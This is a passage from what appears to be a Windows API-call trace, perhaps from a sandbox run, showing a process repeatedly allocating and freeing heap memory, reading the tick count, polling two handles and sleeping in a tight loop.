[0188.609] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.609] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.612] GetTickCount () returned 0x210ea7f [0188.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.612] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.612] GetTickCount () returned 0x210ea7f [0188.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.612] GetTickCount () returned 0x210ea7f [0188.612] GetTickCount () returned 0x210ea7f [0188.612] GetTickCount () returned 0x210ea7f [0188.612] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.612] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.612] GetTickCount () returned 0x210ea7f [0188.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.612] GetTickCount () returned 0x210ea7f [0188.612] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.612] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.617] GetTickCount () returned 0x210f325 [0188.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.617] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.617] GetTickCount () returned 0x210f325 [0188.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.617] GetTickCount () returned 0x210f325 [0188.617] GetTickCount () returned 0x210f325 [0188.617] GetTickCount () returned 0x210f325 [0188.617] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.617] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.620] GetTickCount () returned 0x210f325 [0188.620] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.620] GetTickCount () returned 0x210f325 [0188.620] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.620] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.623] GetTickCount () returned 0x210fbbb [0188.623] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.624] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.624] GetTickCount () returned 0x210fbbb [0188.624] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.624] GetTickCount () returned 0x210fbbb [0188.624] GetTickCount () returned 0x210fbbb [0188.624] GetTickCount () returned 0x210fbbb [0188.624] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.624] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.624] GetTickCount () returned 0x210fbbb [0188.624] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.624] GetTickCount () returned 0x210fbbb [0188.624] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.624] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.637] GetTickCount () returned 0x2110461 [0188.637] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0188.637] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.637] GetTickCount () returned 0x2110461 [0188.637] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.637] GetTickCount () returned 0x2110461 [0188.638] GetTickCount () returned 0x2110461 [0188.638] GetTickCount () returned 0x2110461 [0188.638] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.638] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.638] GetTickCount () returned 0x2110461 [0188.638] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.638] GetTickCount () returned 0x2110461 [0188.638] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.638] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0188.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.641] GetTickCount () returned 0x2110cf7 [0188.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0188.641] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.641] GetTickCount () returned 0x2110cf7 [0188.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.641] GetTickCount () returned 0x2110cf7 [0188.641] GetTickCount () returned 0x2110cf7 [0188.641] GetTickCount () returned 0x2110cf7 [0188.641] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.641] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.641] GetTickCount () returned 0x2110cf7 [0188.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.641] GetTickCount () returned 0x2110cf7 [0188.641] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.641] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0188.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.644] GetTickCount () returned 0x211158d [0188.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0188.644] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.645] GetTickCount () returned 0x211158d [0188.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.645] GetTickCount () returned 0x211158d [0188.645] GetTickCount () returned 0x211158d [0188.645] GetTickCount () returned 0x211158d [0188.645] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.645] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.645] GetTickCount () returned 0x211158d [0188.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.645] GetTickCount () returned 0x211158d [0188.645] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.645] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0188.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.648] GetTickCount () returned 0x2111e32 [0188.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.648] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.648] GetTickCount () returned 0x2111e32 [0188.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.648] GetTickCount () returned 0x2111e32 [0188.648] GetTickCount () returned 0x2111e32 [0188.648] GetTickCount () returned 0x2111e32 [0188.648] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.648] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.648] GetTickCount () returned 0x2111e32 [0188.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.648] GetTickCount () returned 0x2111e32 [0188.648] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.648] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.658] GetTickCount () returned 0x21126c8 [0188.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0188.658] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.658] GetTickCount () returned 0x21126c8 [0188.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.658] GetTickCount () returned 0x21126c8 [0188.658] GetTickCount () returned 0x21126c8 [0188.658] GetTickCount () returned 0x21126c8 [0188.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.658] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.658] GetTickCount () returned 0x21126c8 [0188.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.658] GetTickCount () returned 0x21126c8 [0188.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0188.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.661] GetTickCount () returned 0x2112f5e [0188.661] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.661] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.662] GetTickCount () returned 0x2112f5e [0188.662] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.662] GetTickCount () returned 0x2112f5e [0188.662] GetTickCount () returned 0x2112f5e [0188.662] GetTickCount () returned 0x2112f5e [0188.662] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.662] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.662] GetTickCount () returned 0x2112f5e [0188.662] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.662] GetTickCount () returned 0x2112f5e [0188.662] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.662] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.665] GetTickCount () returned 0x2113804 [0188.665] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0188.665] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.665] GetTickCount () returned 0x2113804 [0188.665] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.665] GetTickCount () returned 0x2113804 [0188.665] GetTickCount () returned 0x2113804 [0188.665] GetTickCount () returned 0x2113804 [0188.665] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.665] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.665] GetTickCount () returned 0x2113804 [0188.665] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.665] GetTickCount () returned 0x2113804 [0188.665] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.665] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0188.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.672] GetTickCount () returned 0x211409a [0188.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.672] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.672] GetTickCount () returned 0x211409a [0188.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.672] GetTickCount () returned 0x211409a [0188.672] GetTickCount () returned 0x211409a [0188.672] GetTickCount () returned 0x211409a [0188.672] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.672] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.672] GetTickCount () returned 0x211409a [0188.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.672] GetTickCount () returned 0x211409a [0188.672] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.672] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.675] GetTickCount () returned 0x2114930 [0188.675] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.675] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.676] GetTickCount () returned 0x2114930 [0188.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.676] GetTickCount () returned 0x2114930 [0188.676] GetTickCount () returned 0x2114930 [0188.676] GetTickCount () returned 0x2114930 [0188.676] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.676] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.676] GetTickCount () returned 0x2114930 [0188.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.676] GetTickCount () returned 0x2114930 [0188.676] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.676] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.679] GetTickCount () returned 0x21151d6 [0188.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0188.679] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.679] GetTickCount () returned 0x21151d6 [0188.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.679] GetTickCount () returned 0x21151d6 [0188.679] GetTickCount () returned 0x21151d6 [0188.679] GetTickCount () returned 0x21151d6 [0188.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.679] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.679] GetTickCount () returned 0x21151d6 [0188.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.679] GetTickCount () returned 0x21151d6 [0188.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0188.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.681] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.685] GetTickCount () returned 0x2115a6c [0188.685] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.685] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.686] GetTickCount () returned 0x2115a6c [0188.686] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.686] GetTickCount () returned 0x2115a6c [0188.686] GetTickCount () returned 0x2115a6c [0188.686] GetTickCount () returned 0x2115a6c [0188.686] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.686] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.686] GetTickCount () returned 0x2115a6c [0188.686] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.686] GetTickCount () returned 0x2115a6c [0188.686] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.686] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.686] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.687] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.689] GetTickCount () returned 0x2116302 [0188.689] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.689] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.689] GetTickCount () returned 0x2116302 [0188.689] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.689] GetTickCount () returned 0x2116302 [0188.689] GetTickCount () returned 0x2116302 [0188.689] GetTickCount () returned 0x2116302 [0188.689] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.689] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.690] GetTickCount () returned 0x2116302 [0188.690] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.690] GetTickCount () returned 0x2116302 [0188.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.690] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.692] GetTickCount () returned 0x2116b98 [0188.692] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0188.692] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.693] GetTickCount () returned 0x2116b98 [0188.693] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.693] GetTickCount () returned 0x2116b98 [0188.693] GetTickCount () returned 0x2116b98 [0188.693] GetTickCount () returned 0x2116b98 [0188.693] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.693] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.693] GetTickCount () returned 0x2116b98 [0188.693] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.693] GetTickCount () returned 0x2116b98 [0188.693] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.693] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0188.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.696] GetTickCount () returned 0x211743d [0188.696] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.696] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.696] GetTickCount () returned 0x211743d [0188.696] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.696] GetTickCount () returned 0x211743d [0188.696] GetTickCount () returned 0x211743d [0188.696] GetTickCount () returned 0x211743d [0188.696] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.696] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.696] GetTickCount () returned 0x211743d [0188.696] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.696] GetTickCount () returned 0x211743d [0188.696] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.697] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.701] GetTickCount () returned 0x2117cd3 [0188.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.701] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.701] GetTickCount () returned 0x2117cd3 [0188.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.701] GetTickCount () returned 0x2117cd3 [0188.701] GetTickCount () returned 0x2117cd3 [0188.701] GetTickCount () returned 0x2117cd3 [0188.701] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.701] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.701] GetTickCount () returned 0x2117cd3 [0188.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.701] GetTickCount () returned 0x2117cd3 [0188.701] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.701] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.704] GetTickCount () returned 0x2118569 [0188.704] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.704] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.704] GetTickCount () returned 0x2118569 [0188.704] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.704] GetTickCount () returned 0x2118569 [0188.704] GetTickCount () returned 0x2118569 [0188.704] GetTickCount () returned 0x2118569 [0188.704] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.704] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.704] GetTickCount () returned 0x2118569 [0188.704] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.704] GetTickCount () returned 0x2118569 [0188.704] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.704] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.708] GetTickCount () returned 0x2118dff [0188.708] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0188.708] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.708] GetTickCount () returned 0x2118dff [0188.708] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.708] GetTickCount () returned 0x2118dff [0188.708] GetTickCount () returned 0x2118dff [0188.708] GetTickCount () returned 0x2118dff [0188.708] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.708] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.708] GetTickCount () returned 0x2118dff [0188.708] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.708] GetTickCount () returned 0x2118dff [0188.708] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.708] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0188.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.711] GetTickCount () returned 0x21196a5 [0188.711] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.711] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.712] GetTickCount () returned 0x21196a5 [0188.712] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.712] GetTickCount () returned 0x21196a5 [0188.712] GetTickCount () returned 0x21196a5 [0188.712] GetTickCount () returned 0x21196a5 [0188.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.712] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.712] GetTickCount () returned 0x21196a5 [0188.712] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.712] GetTickCount () returned 0x21196a5 [0188.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.713] NtDelayExecution 